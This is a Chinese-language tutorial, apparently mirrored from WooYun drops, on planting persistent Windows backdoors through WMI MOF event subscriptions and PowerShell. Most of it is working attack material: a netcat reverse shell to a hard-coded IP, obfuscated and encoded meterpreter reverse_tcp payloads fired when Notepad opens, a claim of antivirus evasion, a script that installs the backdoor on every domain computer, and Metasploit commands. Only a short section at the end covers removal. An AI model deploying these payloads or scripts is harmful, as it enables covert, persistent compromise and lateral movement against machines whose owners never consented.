Powershell之MOF後門
作者:
·
2016/01/25 10:30
0x00 MOF
Managed Object Format (MOF)是WMI資料庫中類和類例項的原始儲存形式。具體介紹可以閱讀《WMI 的攻擊,防禦與取證分析技術之防禦篇》,Windows 管理規範 (WMI) 提供了以下三種方法編譯到WMI儲存庫的託管物件格式 (MOF) 檔案:
- 方法 1: 使用Mofcomp.exe。
- 方法 2: 使用 IMofCompiler 介面和
$ CompileFile方法。 - 方法 3: 拖放到
%SystemRoot%\System32\Wbem\MOF資料夾的 MOF 檔案。
第三種方法僅為向後相容性與早期版本(win2003)的 WMI 提供。
一個簡單的MOF反彈shell示例:
#!vb
#pragma namespace ("\\\\.\\root\\subscription")
instance of __EventFilter as $FILTER
{
Name = "CLASS_FIRST_TEST";
EventNamespace = "root\\cimv2";
Query = "SELECT * FROM __InstanceCreationEvent "
"WHERE TargetInstance ISA \"Win32_NTLogEvent\" AND "
"TargetInstance.LogFile=\"Application\"";
QueryLanguage = "WQL";
};
instance of ActiveScriptEventConsumer as $CONSUMER
{
Name = "CLASS_FIRST_TEST";
ScriptingEngine = "VBScript";
ScriptText =
"Set objShell = CreateObject(\"WScript.Shell\")\n"
"objShell.Run \"C:\\Windows\\system32\\cmd.exe /C C:\\nc.exe 192.168.38.1 1337 -e C:\\Windows\\system32\\cmd.exe\"\n";
};
instance of __FilterToConsumerBinding
{
Consumer = $CONSUMER ;
Filter = $FILTER ;
};
0x01 MOF and Powershell
如果獲取了管理員許可權,使用MOF可以做一個永久的隱藏後門。對於很多後門來說,都需要一個觸發,在這裡,可以使用WMI Query Language(WQL)來查詢事件,以便確定什麼時候觸發我們的後門。(更多詳細的解釋可在檢視戳我,戳我)。
比如,我們想做一個後門透過開啟notepad來觸發,可以使用以下查詢:
#!sql
"SELECT * FROM __InstanceCreationEvent Within 5 "
"Where TargetInstance Isa \"Win32_Process\" "
"And Targetinstance.Name = \"notepad.exe\" ";
如果想透過關閉Powershell來觸發,可以使用以下查詢:
#!sql
"SELECT * FROM __InstanceDeletionEvent Within 5 "
"Where TargetInstance Isa \"Win32_Process\" "
"And Targetinstance.Name = \"powershell.exe\" ";
如果想透過每小時在30分鐘的時候觸發,可使用以下查詢:
#!sql
"Select * From __InstanceModificationEvent "
"Where TargetInstance Isa \"Win32_LocalTime\" "
"And TargetInstance.Minute = 30 "
當我們確定了我們的觸發方式以後,我們就可以把我們的查詢寫成一個MOF過濾器:
#!vb
instance of __EventFilter as $Filt
{
Name = "EventFilter";
EventNamespace = "Root\\Cimv2";
Query = <插入查詢>
QueryLanguage = "WQL";
};
比如我們使用開啟Notepad作為觸發條件,那麼可以這樣寫:
#!vb
instance of __EventFilter as $Filt
{
Name = "EventFilter";
EventNamespace = "Root\\Cimv2";
Query ="SELECT * FROM __InstanceCreationEvent Within 5"
"Where TargetInstance Isa \"Win32_Process\" "
"And Targetinstance.Name = \"notepad.exe\" ";
QueryLanguage = "WQL";
};
下面我們就需要事件消費者的響應了,在這裡我們可以使用不同的EventConsumer類,透過使用CommandLineEventConsumer,我們可以使用Veil輸出的payload,同時也可以使用ActiveScriptEventConsumer來嵌入或者呼叫VBS指令碼。下面是一個使用CommandLineEventConsumer的示例:
#!vb
"cmd /C [data here]";
下面使用Veil來生成Powershell payload:
選擇x86裡面進行測試,payload如下:
#!bash
powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXaAhC4qa0SG2KCGofojw4m4FsWe9a63FiQ/PvHYPTFkSrqk/H3p0558xlPQHHcOI6swulLrPcWPLde7QaVb8XL5Vygznk5UJJAQWlxIAV8T1caroiC1+kpTJVp0oZ4bdnmxBKqQmqFusWH4Kj/9Y5t5gS3qwYljudsuVdh/BLuf36Tbs9adTdE4ds/egVXPQEN9HnxTcUBNO6IMziCVI8NeIeqWgR/Nkbd6fLpcWiGKeZVPV8NGIBtBywMfY+hLcynvGmzpHDp8RFZG8HXllDRhjVht6IPHC8Ij43WrNRf6972Iu7B8P43SDuDrp7IQyHw8MAvoMpKdKlUkfg5Vzc7NTatPH23LdLzU3VAn13URO6IQwCDqw4kMmvUaBco+/lr4ge+D5xvPof+GZnktjkGi23ojFuuCn9HnOGSdDZb9TqWTJvCKuzsbNZSYXgs0Kk6O/JATw2Tjovrdah99DZD7vhn7s9VuldwWwTozGArXNrLCvK4y57kayLMGi+Oh1WYHOebNzt6F45eo90xoUW/ox3as5GPqR6qTDgrKg73zoecS6vRdTMDaIMswXaC7yVWpI0GjwB0STNENyvUvd7LkSa/4o8FQhPJ+NSiyaygChPi4JWtmwGdOzRaPTiiSWhV8cfUd/RKkyqfpIkDIMkcHbOr0tNMsP4aSlNPkW7lgKL+FNqi1WqmhGavG46CAnP7flxzH2vindtD4IQforw+tFu6u3rY8XQq8IGkpcbM6XUUjRViDlEUxRGL2F4MEiSrUhJrB63PwA=\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();"
接下來,我們把上面的payload放到下面的模板中:
#!vb
instance of CommandLineEventConsumer as $Cons
{
Name = "Powershell Helper";
RunInteractively=false;
CommandLineTemplate="cmd /C powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command "Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\"nVPbTttAEH33V4wsS9iKbTkXaAhC4qa0SG2KCGofojw4m4FsWe9a63FiQ/PvHYPTFkSrqk/H3p0558xlPQHHcOI6swulLrPcWPLde7QaVb8XL5Vygznk5UJJAQWlxIAV8T1caroiC1+kpTJVp0oZ4bdnmxBKqQmqFusWH4Kj/9Y5t5gS3qwYljudsuVdh/BLuf36Tbs9adTdE4ds/egVXPQEN9HnxTcUBNO6IMziCVI8NeIeqWgR/Nkbd6fLpcWiGKeZVPV8NGIBtBywMfY+hLcynvGmzpHDp8RFZG8HXllDRhjVht6IPHC8Ij43WrNRf6972Iu7B8P43SDuDrp7IQyHw8MAvoMpKdKlUkfg5Vzc7NTatPH23LdLzU3VAn13URO6IQwCDqw4kMmvUaBco+/lr4ge+D5xvPof+GZnktjkGi23ojFuuCn9HnOGSdDZb9TqWTJvCKuzsbNZSYXgs0Kk6O/JATw2Tjovrdah99DZD7vhn7s9VuldwWwTozGArXNrLCvK4y57kayLMGi+Oh1WYHOebNzt6F45eo90xoUW/ox3as5GPqR6qTDgrKg73zoecS6vRdTMDaIMswXaC7yVWpI0GjwB0STNENyvUvd7LkSa/4o8FQhPJ+NSiyaygChPi4JWtmwGdOzRaPTiiSWhV8cfUd/RKkyqfpIkDIMkcHbOr0tNMsP4aSlNPkW7lgKL+FNqi1WqmhGavG46CAnP7flxzH2vindtD4IQforw+tFu6u3rY8XQq8IGkpcbM6XUUjRViDlEUxRGL2F4MEiSrUhJrB63PwA=\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();";
};
這裡要注意一點就是如果payload裡面存在需要轉義的
"以及\這裡可以使用雙引號將qi其引用並用\進行轉義。
最後我們所寫的MOF檔案是這樣的:
#!vb
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{
Name = "Powershell Helper";
RunInteractively=false;
CommandLineTemplate="cmd /C powershell.exe -NoP -NonI -W Hidden"
" -Exec Bypass -Command \"Invoke-Expression "
"$(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String"
"(\\\"nVPbTttAEH33V4wsS9iKbTkXaAhC4qa0SG2KCGofojw4m4FsWe9a63FiQ/PvHYPTFkSrqk/H3p0558xlPQHHcOI6swulLrPcWPLde7QaVb8XL5Vygznk5"
"UJJAQWlxIAV8T1caroiC1+kpTJVp0oZ4bdnmxBKqQmqFusWH4Kj/9Y5t5gS3qwYljudsuVdh/BLuf36Tbs9adTdE4ds/egVXPQEN9HnxTcUBNO6IMziCVI8NeIeqWgR/"
"Nkbd6fLpcWiGKeZVPV8NGIBtBywMfY+hLcynvGmzpHDp8RFZG8HXllDRhjVht6IPHC8Ij43WrNRf6972Iu7B8P43SDuDrp7IQyHw8MAvoMpKdKlUkfg5Vzc7NTatPH23LdLzU3VAn13"
"URO6IQwCDqw4kMmvUaBco+/lr4ge+D5xvPof+GZnktjkGi23ojFuuCn9HnOGSdDZb9TqWTJvCKuzsbNZSYXgs0Kk6O/"
"JATw2Tjovrdah99DZD7vhn7s9VuldwWwTozGArXNrLCvK4y57kayLMGi+Oh1WYHOebNzt6F45eo90xoUW/"
"ox3as5GPqR6qTDgrKg73zoecS6vRdTMDaIMswXaC7yVWpI0GjwB0STNENyvUvd7LkSa/4o8FQhPJ+NSiyaygChPi4JWtmwGdOzRaPTiiSWhV8cfUd/"
"RKkyqfpIkDIMkcHbOr0tNMsP4aSlNPkW7lgKL+FNqi1WqmhGavG46CAnP7flxzH2vindtD4IQforw+tFu6u3rY8XQq8IGkpcbM6XUUjRViDlEUxRGL2F4MEiSrUhJrB63PwA=\\\")))), "
"[IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"";
};
instance of __EventFilter as $Filt
{
Name = "EventFilter";
EventNamespace = "Root\\Cimv2";
Query ="SELECT * FROM __InstanceCreationEvent Within 5"
"Where TargetInstance Isa \"Win32_Process\" "
"And Targetinstance.Name = \"notepad.exe\" ";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding {
Filter = $Filt;
Consumer = $Cons;
};
如果覺得麻煩的話,可以使用這個工具unicorn來生成沒有特殊字元的payload,使用方式很簡單:
#!bash
☁ unicorn [master] python unicorn.py windows/meterpreter/reverse_tcp 192.168.74.141 8889
將powershell_attack.txt的內容複製進來,然後msfconsole -r unicorn.rc 則可開啟監聽,修改後的MOF檔案如下:
#!vb
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{
Name = "Powershell Helper";
RunInteractively=false;
CommandLineTemplate="cmd /C powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAZAA5ACwAMAB4AGMANAAsADAAeABiAGEALAAwAHgAYQBlACwAMAB4AGUAZAAsADAAeABmADMALAAwAHgANgA0ACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGYALAAwAHgAMgBiACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANAA3ACwAMAB4ADMAMQAsADAAeAA1ADcALAAwAHgAMQA4ACwAMAB4ADgAMwAsADAAeABjADcALAAwAHgAMAA0ACwAMAB4ADAAMwAsADAAeAA1ADcALAAwAHgAYgBhACwAMAB4ADAAZgAsADAAeAAwADYALAAwAHgAOQA4ACwAMAB4ADIAYQAsADAAeAA0AGQALAAwAHgAZQA5ACwAMAB4ADYAMQAsADAAeABhAGEALAAwAHgAMwAyACwAMAB4ADYAMwAsADAAeAA4ADQALAAwAHgAOQBiACwAMAB4ADcAMgAsADAAeAAxADcALAAwAHgAYwBjACwAMAB4ADgAYgAsADAAeAA0ADIALAAwAHgANQAzACwAMAB4ADgAMAAsADAAeAAyADcALAAwAHgAMgA4ACwAMAB4ADMAMQAsADAAeAAzADEALAAwAHgAYgBjACwAMAB4ADUAYwAsADAAeAA5AGUALAAwAHgAMwA2ACwAMAB4ADcANQAsADAAeABlAGEALAAwAHgAZgA4ACwAMAB4ADcAOQAsADAAeAA4ADYALAAwAHgANAA3ACwAMAB4ADMAOAAsADAAeAAxAGIALAAwAHgAMAA0ACwAMAB4ADkAYQAsADAAeAA2AGQALAAwAHgAZgBiACwAMAB4ADMANQAsADAAeAA1ADUALAAwAHgANgAwACwAMAB4AGYAYQAsADAAeAA3ADIALAAwAHgAOAA4ACwAMAB4ADgAOQAsADAAeABhAGUALAAwAHgAMgBiACwAMAB4AGMANgAsADAAeAAzAGMALAAwAHgANQBmACwAMAB4ADUAOAAsADAAeAA5ADIALAAwAHgAZgBjACwAMAB4AGQANAAsADAAeAAxADIALAAwAHgAMwAyACwAMAB4ADgANQAsADAAeAAwADkALAAwAHgAZQAyACwAMAB4ADMANQAsADAAeABhADQALAAwAHgAOQBmACwAMAB4ADcAOQAsADAAeAA2AGMALAAwAHgANgA2ACwAMAB4ADIAMQAsADAAeABhAGUALAAwAHgAMAA0ACwAMAB4ADIAZgAsADAAeAAzADkALAAwAHgAYgAzACwAMAB4ADIAMQAsADAAeABmADkALAAwAHgAYgAyACwAMAB4ADAANwAsADAAeABkAGQALAAwAHgAZgA4ACwAMAB4ADEAMgAsADAAeAA1ADYALAAwAHgAMQBlACwAMAB4ADUANgAsADAAeAA1AGIALAAwAHgANQA3ACwAMAB4AGUAZAAsADAAeABhADYALAAwAHgAOQBiACwAMAB4ADUAZgAsADAAeAAwAGUALAAwAHgAZABkACwAMAB4AGQANQAsADAAeAA5AGMALAAwAHgAYgAzACwAMAB4AGUANgAsADAAeAAyADEALAAwAHgAZABmACwAMAB4ADYAZgAsADAAeAA2ADIALAAwAHgAYgAyACwAMAB4ADQANwAsADAAeABmAGIALAAwAHgAZAA0ACwAMAB4ADEAZQAsADAAeAA3ADYALAAwAHgAMgA4ACwAMAB4ADgAMgAsADAAeABkADUALAAwAHgANwA0ACwAMAB4ADgANQAsADAAeABjADAALAAwAHgAYgAyACwAMAB4ADkAOAAsADAAeAAxADgALAAwAHgAMAA0ACwAMAB4AGMAOQAsADAAeABhADQALAAwAHgAOQAxACwAMAB4AGEAYgAsADAAeAAxAGUALAAwAHgAMgBkACwAMAB4AGUAMQAsADAAeAA4AGYALAAwAHgAYgBhACwAMAB4ADcANgAsADAAeABiADEALAAwAHgAYQBlACwAMAB4ADkAYgAsADAAeABkADIALAAwAHgAMQA0ACwAMAB4AGMAZQAsADAAeABmAGMALAAwAHgAYgBkACwAMAB4AGMAOQAsADAAeAA2AGEALAAwAHgANwA2ACwAMAB4ADUAMwAsADAAeAAxAGQALAAwAHgAMAA3ACwAMAB4AGQANQAsADAAeAAzAGIALAAwAHgAZAAyACwAMAB4ADIAYQAsADAAeABlADYALAAwAHgAYgBiACwAMAB4ADcAYwAsADAAeAAzAGMALAAwAHgAOQA1ACwAMAB4ADgAOQAsADAAeAAyADMALAAwAHgAOQA2ACwAMAB4ADMAMQAsADAAeABhADEALAAwAHgAYQBjACwAMAB4ADMAMAAsADAAeABjADUALAAwAHgAYwA2ACwAMAB4ADgANgAsADAAeAA4ADUALAAwAHgANQA5ACwAMAB4ADMAOQAsADAAeAAyADkALAAwAHgAZgA2ACwAMAB4ADcAMAAsADAAeABmAGQALAAwAHgANwBkACwAMAB4AGEANgAsADAAeABlAGEALAAwAHgAZAA0ACwAMAB4AGYAZAAsADAAeAAyAGQALAAwAHgAZQBiACwAMAB4AGQAOQAsADAAeAAyAGIALAAwAHgAZABiACwAMAB4AGUAZQAsADAAeAA0AGQALAAwAHgAMQA0ACwAMAB4AGIANAAsADAAeABiAGIALAAwAHgAMAAwACwAMAB4AGYAYwAsADAAeABjADcALAAwAHgAMwBiACwAMAB4ADMAOAAsADAAeAA0ADQALAAwAHgANABlACwAMAB4AGQAZAAsADAAeAA2AGMALAAwAHgAZQA2ACwAMAB4ADAAMQAsADAAeAA3ADIALAAwAHgAYwBjACwAMAB4ADUANgAsADAAeABlADIALAAwAHgAMgAyACwAMAB4AGEANAAsADAAeABiAGMALAAwAHgAZQBkACwAMAB4ADEAZAAsADAAeABkADQALAAwAHgAYgBlACwAMAB4ADIANwAsADAAeAAzADYALAAwAHgANwBlACwAMAB4ADUAMQAsADAAeAA5AGUALAAwAHgANgBlACwAMAB4ADEANgAsADAAeABjADgALAAwAHgAYgBiACwAMAB4AGUANQAsADAAeAA4ADcALAAwAHgAMQA1ACwAMAB4ADEANgAsADAAeAA4ADAALAAwAHgAOAA3ACwAMAB4ADkAZQAsADAAeAA5ADUALAAwAHgANwA0ACwAMAB4ADQAOQAsADAAeAA1ADcALAAwAHgAZAAzACwAMAB4ADYANgAsADAAeAAzAGQALAAwAHgAOQA3ACwAMAB4AGEAZQAsADAAeABkADUALAAwAHgAZQBiACwAMAB4AGEAOAAsADAAeAAwADQALAAwAHgANwAzACwAMAB4ADEAMwAsADAAeAAzAGQALAAwAHgAYQAzACwAMAB4AGQAMgAsADAAeAA0ADQALAAwAHgAYQA5ACwAMAB4AGEAOQAsADAAeAAwADMALAAwAHgAYQAyACwAMAB4ADcANgAsADAAeAA1ADEALAAwAHgANgA2ACwAMAB4AGIAOQAsADAAeABiAGYALAAwAHgAYwA3ACwAMAB4AGMAOQAsADAAeABkADUALAAwAHgAYgBmACwAMAB4ADAANwAsADAAeABjAGEALAAwAHgAMgA1ACwAMAB4ADkANgAsADAAeAA0AGQALAAwAHgAYwBhACwAMAB4ADQAZAAsADAAeAA0AGUALAAwAHgAMwA2ACwAMAB4ADkAOQAsADAAeAA2ADgALAAwAHgAOQAxACwAMAB4AGUAMwAsADAAeAA4AGQALAAwAHgAMgAxACwAMAB4ADAANAAsADAAeAAwAGMALAAwAHgAZQA0ACwAMAB4ADkANgAsADAAeAA4AGYALAAwAHgANgA0ACwAMAB4ADAAYQAsADAAeABjADEALAAwAHgAZgA4ACwAMAB4ADIAYQAsADAAeABmADUALAAwAHgAMgA0ACwAMAB4AGYAOQAsADAAeAAxADcALAAwAHgAMgAwACwAMAB4ADAAMAAsADAAeAA4AGYALAAwAHgANwA5ACwAMAB4AGYAMAA7ACQAZwAgAD0AIAAwAHgAMQAwADAAMAA7AGkAZgAgACgAJAB6AC4ATABlAG4AZwB0AGgAIAAtAGcAdAAgADAAeAAxADAAMAAwACkAewAkAGcAIAA9ACAAJAB6AC4ATABlAG4AZwB0AGgAfQA7ACQAeAA9ACQAdwA6ADoAVgBpAHIAdAB1AGEAbABBAGwAbABvAGMAKAAwACwAMAB4ADEAMAAwADAALAAkAGcALAAwAHgANAAwACkAOwBmAG8AcgAgACgAJABpAD0AMAA7ACQAaQAgAC0AbABlACAAKAAkAHoALgBMAGUAbgBnAHQAaAAtADEAKQA7ACQAaQArACsAKQAgAHsAJAB3ADoAOgBtAGUAbQBzAGUAdAAoAFsASQBuAHQAUAB0AHIAXQAoACQAeAAuAFQAbwBJAG4AdAAzADIAKAApACsAJABpACkALAAgACQAegBbACQAaQBdACwAIAAxACkAfQA7ACQAdwA6ADoAQwByAGUAYQB0AGUAVABoAHIAZQBhAGQAKAAwACwAMAAsACQAeAAsADAALAAwACwAMAApADsAZgBvAHIAIAAoADsAOwApAHsAUwB0AGEAcgB0AC0AcwBsAGUAZQBwACAANgAwAH0AOwAnADsAJABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AFQAbwBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABCAHkAdABlAHMAKAAkADEAKQApADsAJAAyACAAPQAgACIALQBlAG4AYwAgACIAOwBpAGYAKABbAEkAbgB0AFAAdAByAF0AOgA6AFMAaQB6AGUAIAAtAGUAcQAgADgAKQB7ACQAMwAgAD0AIAAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAAgACsAIAAiAFwAcwB5AHMAdwBvAHcANgA0AFwAVwBpAG4AZABvAHcAcwBQAG8AdwBlAHIAUwBoAGUAbABsAFwAdgAxAC4AMABcAHAAbwB3AGUAcgBzAGgAZQBsAGwAIgA7AGkAZQB4ACAAIgAmACAAJAAzACAAJAAyACAAJABlACIAfQBlAGwAcwBlAHsAOwBpAGUAeAAgACIAJgAgAHAAbwB3AGUAcgBzAGgAZQBsAGwAIAAkADIAIAAkAGUAIgA7AH0A";
};
instance of __EventFilter as $Filt
{
Name = "EventFilter";
EventNamespace = "Root\\Cimv2";
Query ="SELECT * FROM __InstanceCreationEvent Within 5"
"Where TargetInstance Isa \"Win32_Process\" "
"And Targetinstance.Name = \"notepad.exe\" ";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding {
Filter = $Filt;
Consumer = $Cons;
};
將以上內容儲存為test.mof,如果擁有管理員許可權,可以將test.mof放到%SYSTEMROOT%/wbem/MOF目錄(xp以下作業系統),系統會自動編譯執行此指令碼,如果在XP 或者更高版本的作業系統上可以執行如下命令:
#!bash
C:\>mofcomp.exe c:\test.mof
執行以後,當開啟記事本的時候,則可生成meterpreter會話:
同時,這個mof檔案是免殺的:
當然除了這個我們還可以做其他事情,比如關閉某個程式,當其啟動時就關閉,MOF檔案如下:
#!vb
#PRAGMA NAMESPACE ("\\\\.\\root\\subscription")
instance of CommandLineEventConsumer as $Cons
{
Name = "Powershell Helper 2";
RunInteractively=false;
CommandLineTemplate="cmd /C powershell.exe Stop-Process -processname notepad -Force";
};
instance of __EventFilter as $Filt
{
Name = "EventFilter 2";
EventNamespace = "Root\\Cimv2";
Query ="SELECT * FROM __InstanceCreationEvent Within 3"
"Where TargetInstance Isa \"Win32_Process\" "
"And Targetinstance.Name = \"notepad.exe\" ";
QueryLanguage = "WQL";
};
instance of __FilterToConsumerBinding
{
Filter = $Filt;
Consumer = $Cons;
};
如果我們想要遠端執行,可使用如下命令:
#!bash
c:\>mofcomp -N \\[machinename]\root\subscription test.mof
如果我們在域內,還可以用下面的Powershell指令碼批次遠端執行:
#!vb
function getNetHosts
{
$final = @()
#獲取域計算機
$strCategory = "computer"
$objDomain = New-Object System.DirectoryServices.DirectoryEntry
$objSearcher = New-Object System.DirectoryServices.DirectorySearcher
$objSearcher.SearchRoot = $objDomain
$objSearcher.Filter = ("(objectCategory=$strCategory)")
$colProplist = "name", "cn"
foreach ($i in $colPropList){$objSearcher.PropertiesToLoad.Add($i)}
$colResults = $objSearcher.FindAll()
foreach ($objResult in $colResults)
{
$objComputer = $objResult.Properties
$bleh = $objComputer.name
$final += $bleh
}
return $final
}
$nethosts= getNetHosts
foreach ($nethost in $nethosts)
{
write-host "Exec on " + $nethost
$str = "\\"+$nethost+"\root\subscription"
$m = mofcomp -N $str test.mof
}
使用方式為:
#!bash
c:\> powershell -ExecutionPolicy Bypass .\test.ps1 # mof檔案在同一個資料夾下面
0x02 Meterpreter Post Module
這裡有一個msf的模組,可以實現此後門安裝,地址:metasploit-modules,下載以後將其移動到post/windows/資料夾則可使用:
#!bash
☁ persistence [master] mv mof_ps_persist.rb $msf_path/modules/post/windows/
在獲取meterpreter會話以後,安裝此後門:
#!bash
msf exploit(web_delivery) > use post/windows/mof_ps_persist
msf post(mof_ps_persist) > set LHOST 192.168.101.1
LHOST => 192.168.101.1
msf post(mof_ps_persist) > set lport 8887
lport => 8887
msf post(mof_ps_persist) > set session 4
session => 4
msf post(mof_ps_persist) > run
預設payload為
windows/meterpreter/reverse_tcp,執行時間間隔為60秒,如果想透過觸發方式啟動,可以自行修改ruby指令碼。
開啟監聽:
#!bash
msf post(mof_ps_persist) > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > set lhost 192.168.101.1
lhost => 192.168.101.1
msf exploit(handler) > set lport 8887
lport => 8887
msf exploit(handler) > exploit -j
如果看到錯誤80041003,說明許可權不夠,可以試試試用bypassuac,具體怎麼bypass,請戳我。
當會話中斷以後,由於mof自動執行,所以可以重新獲取meterpreter會話。當對方電腦重啟以後,仍可以獲取會話。
如果想要清除後門,可以resource 生成的rc檔案。
0x03 停止MOF
要停止mof,可進行如下操作:
- 第一
net stop winmgmt停止服務, - 第二 刪除資料夾:
C:\WINDOWS\system32\wbem\Repository\ - 第三
net start winmgmt啟動服務
0x04 小結
本篇文章主要介紹了一些結合MOF與powershell來進行製作後門的方式方法,對於MOF大家可能接觸最多的就是在MYSQL提權時使用MOF來提權,其實玩兒法還很多,大家可以繼續來研究研究,希望此文對你有幫助。
0x05 參考
- /tips/?id=10346
- /tips/?id=9973
- /tips/?id=8290
- http://www.codeproject.com/Articles/27914/WMI-MOF-Basics
- http://www.codeproject.com/Articles/28226/Creating-WMI-Permanent-Event-Subscriptions-Using-M
- http://poppopret.blogspot.com/2011/09/playing-with-mof-files-on-windows-for.html
- http://www.cnblogs.com/2018/archive/2010/09/25/1834879.html
- http://www.jb51.net/article/52489.htm
本文由evi1cg原創並首發於烏雲drops,轉載請註明
本文章來源於烏雲知識庫,此映象為了方便大家學習研究,文章版權歸烏雲知識庫!
相關文章
- mysql提權之mof詳解MySql
- UAV MOF工作原理之Agent注入機制原理
- MOF 四層模型模型
- Powershell &amp;amp; Powersploit 入門
- powershell入門教程-v0.3版
- Powershell tricks::Powershell RemotingREM
- 超級隱蔽之後門技巧
- Powershell————1、認識Powershell
- 前後端分離之Ajax入門後端
- Powershell————2、Powershell互動式
- Windows PowerShellWindows
- PowerShell 使用
- PowerShell使用
- Powershell(3)
- powershell指令碼指令碼
- PowerShell HelpWriter 2021
- Powershell免殺
- [PowerShell] 快速入門, 基本語法, 常用型別, 函式, .NET 互操作型別函式
- 學習Python之後,可以做哪些兼職?Python入門!Python
- Windows Powershell & 環境變數;Powershell where命令無輸出Windows變數
- MySQL資料庫Root許可權MOF方法提權研究MySql資料庫
- iBackDoor(愛後門)和DroidBackDoor(安後門):同時影響iOS和Android的”後門”SDK?iOSAndroid
- Windows 升級 powershellWindows
- PowerShell安裝IIS
- powershell 版本問題
- Powershell tricks::Bypass AV
- Powershell and Windows RAW SOCKETWindows
- Linux 安裝 powershellLinux
- 獨立遊戲入門,在失敗與踩坑之後遊戲
- PhpStudy 後門分析PHP
- NodeJs後門程式NodeJS
- 天堂之門
- 【GiraKoo】PowerShell美化筆記筆記
- Powershell 提權框架-Powerup框架
- IPFS的PowerShell安裝
- 粘滯鍵後門
- PHP後門新玩法:一款猥瑣的PHP後門分析PHP
- 資料治理之後設資料管理的利器——Atlas入門寶典